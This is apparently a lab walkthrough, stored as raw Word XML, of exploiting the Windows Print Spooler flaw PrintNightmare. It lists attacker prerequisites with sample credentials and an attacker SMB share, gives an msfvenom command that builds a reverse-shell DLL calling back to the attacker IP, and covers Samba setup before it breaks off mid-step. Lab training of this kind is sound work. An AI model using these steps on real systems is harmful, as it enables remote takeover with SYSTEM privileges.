      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> abuses the Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Print Spooler</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> service, which runs as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, and allows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF37E9" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B54A2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>Authenticated users can instruct the spooler to load an attacker-hosted DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4170CE78" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B54A2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Local Privilege Escalation (LPE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>Local non-admin users can escalate to SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADAFDB" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B54A2C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation revolves around forcing the spooler to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>install a malicious printer driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, where the “driver” is actually an attacker-supplied DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC8193" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B47DA4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc214502063"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2. Exploitation Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6593C8BB" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B54A2C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>Attacker prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71889016" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C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Valid credentials for target (domain or local user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F86640" w14:textId="1A71D8DE" w:rsidR="00A31C95" w:rsidRPr="00FE4311" w:rsidRDefault="00A31C95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Username: user1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48074F6C" w14:textId="6184460C" w:rsidR="00A31C95" w:rsidRPr="00FE4311" w:rsidRDefault="00A31C95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Password: P@ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C9A40" w14:textId="793F2E1C" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C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SMB share containing malicious DLL payload</w:t>
      </w:r>
      <w:r w:rsidR="00933953" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (\\172.16.10.128\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00933953" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00933953" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41863F46" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C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Python script (CVE-2021-1675.py from cube0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563638D8" w14:textId="65DB2C23" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00836856">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Metasploit listener to catch the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F9D31" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B54A2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Target requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE6221" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="007364A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Print Spooler service running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7533E" w14:textId="6752A951" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="007364A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Vulnerable Windows version</w:t>
      </w:r>
      <w:r w:rsidR="00F063C5" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows Server 2016</w:t>
      </w:r>
      <w:r w:rsidR="00215AB0" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394167C3" w14:textId="668A0432" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="007364A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Ability for user to add a printer driver (default behavior before patches)</w:t>
      </w:r>
      <w:r w:rsidR="00415A1E" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">END of </w:t>
      </w:r>
      <w:r w:rsidR="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Slides 1-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C3298" w14:textId="7BD4FE1B" w:rsidR="00B07857" w:rsidRDefault="00393500">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Attacker IP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Address(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Kali Linux)</w:t>
      </w:r>
      <w:r w:rsidR="00B54A2C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393500">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56CAFD43" wp14:editId="62EF4837">
            <wp:extent cx="4773977" cy="1100667"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="3928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2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885" cy="11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E76">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="200CECB1" w14:textId="721ADA78" w:rsidR="009A2DE8" w:rsidRDefault="00BC7AEC">
      <w:r>
        <w:t xml:space="preserve">Victim </w:t>
      </w:r>
      <w:r w:rsidR="00764767">
        <w:t xml:space="preserve">Details </w:t>
      </w:r>
      <w:r w:rsidR="00777B99">
        <w:t>(Windows Server 2016)</w:t>
      </w:r>
      <w:r w:rsidR="00764767" w:rsidRPr="00764767">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14CD55FE" wp14:editId="5737AC95">
            <wp:extent cx="3674533" cy="2009319"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13676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5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661" cy="201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653C3" w:rsidRPr="001653C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CC9CD42" wp14:editId="7065E0BA">
            <wp:extent cx="3674110" cy="841354"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7930422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229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690" cy="8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2135" w14:textId="77777777" w:rsidR="00BB0F38" w:rsidRDefault="00BB0F38"/>
    <w:p w14:paraId="74D3952F" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc214502064"/>
      <w:r w:rsidRPr="009A2DE8">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Exploitation Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="624D9A46" w14:textId="77777777" w:rsidR="00977679" w:rsidRPr="00977679" w:rsidRDefault="00977679" w:rsidP="00977679"/>
    <w:p w14:paraId="2F68275A" w14:textId="7591C8DC" w:rsidR="009A2DE8" w:rsidRPr="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc214502065"/>
      <w:r w:rsidRPr="009A2DE8">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Payload Preparation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="49BA6C41" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC266C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory for the payload under </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC266C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC266C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7DB2C" w14:textId="3096E464" w:rsidR="009A2DE8" w:rsidRPr="00DB02BB" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8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DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000601FC" w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00B35AFB" w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>kdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B35AFB" w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0346D1B2" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRPr="0067641D" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:r>
        <w:t xml:space="preserve">Crete the  reverse shell payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EC266C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE741C0" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRPr="00DB02BB" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:t xml:space="preserve"> -f &lt;format&gt; -p &lt;payload type&gt; LHOST=&lt;IP&gt; LPORT=&lt;port&gt; -o &lt;payload filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2436A" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933711">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570E9C3" w14:textId="4FCB7E88" w:rsidR="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p  windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=172.16.10.128  LPORT=443 -o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB02BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/rvshell.dll</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">-f  &lt;format&gt;  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3173">
        <w:t>Output format (use --list formats to list)</w:t>
      </w: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00A4E170" wp14:editId="506943CD">
                <wp:extent cx="4732867" cy="2853267"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:docPr id="156027345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2867" cy="2853267"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6079490" cy="4219575"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="326881319" name="Picture 1" descr="A screen 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0"/>
                            <a:ext cx="3031490" cy="421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2251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81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C4E883" id="Group 1" o:spid="_x0000_s1026" style="width:372.65pt;height:224.65pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="60794,42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 shot of a computer&#10;&#10;AI-generated content may be incorrect." style="position:absolute;left:30480;width:30314;height:4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">
                  <v:imagedata r:id="rId14" o:title="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect"/>
                </v:shape>
                <v:shape id="Picture 1" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;width:30283;height:38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">
                  <v:imagedata r:id="rId15" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00DE4C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4B6C7" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload created under the name rvshell.dll </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003042E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715AFF90" wp14:editId="4B0B38CA">
            <wp:extent cx="4157133" cy="1236924"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="611453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312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729" cy="12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73DA" w14:textId="77777777" w:rsidR="009A2DE8" w:rsidRPr="009A2DE8" w:rsidRDefault="009A2DE8" w:rsidP="009A2DE8"/>
    <w:p w14:paraId="69EFA920" w14:textId="2AE10B48" w:rsidR="00AA67AC" w:rsidRPr="006C2018" w:rsidRDefault="00AA67AC" w:rsidP="000A5380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc214502066"/>
      <w:r>
        <w:t>Configure Samba services to host the payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="297F7636" w14:textId="2DB66C63" w:rsidR="00E96B85" w:rsidRDefault="00E96B85" w:rsidP="00E96B85">
      <w:r>
        <w:br/>
        <w:t>Backup original config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6C066" w14:textId="77777777" w:rsidR="00E96B85" w:rsidRPr="00C77073" w:rsidRDefault="00E96B85" w:rsidP="00E96B85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cp /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb-backup.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="446FC72C" w14:textId="77777777" w:rsidR="00E96B85" w:rsidRDefault="00E96B85" w:rsidP="00E96B85">
      <w:r>
        <w:t>Edit the config using nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38ACB8" w14:textId="77777777" w:rsidR="00E96B85" w:rsidRPr="00C77073" w:rsidRDefault="00E96B85" w:rsidP="00E96B85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C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C46B822" w14:textId="77777777" w:rsidR="00E96B85" w:rsidRDefault="00E96B85" w:rsidP="00E9651F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE5CB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46328D3F" wp14:editId="19C62EF5">
            <wp:extent cx="2573867" cy="538440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6378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5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5764" cy="5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56A2" w14:textId="77777777" w:rsidR="00AE577A" w:rsidRDefault="00AE577A" w:rsidP="00E96B85"/>
    <w:p w14:paraId="1012A70D" w14:textId="7ABAC3A3" w:rsidR="00E96B85" w:rsidRDefault="00E96B85" w:rsidP="00E96B85">
      <w:r>
        <w:t>Enter the details as per the PrintNightmare POC guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26456ED4" w14:textId="77777777" w:rsidR="00AE577A" w:rsidRDefault="00E96B85" w:rsidP="00AE577A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Make sure to replace the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1A73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidR="000D1A73">
        <w:t xml:space="preserve"> to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
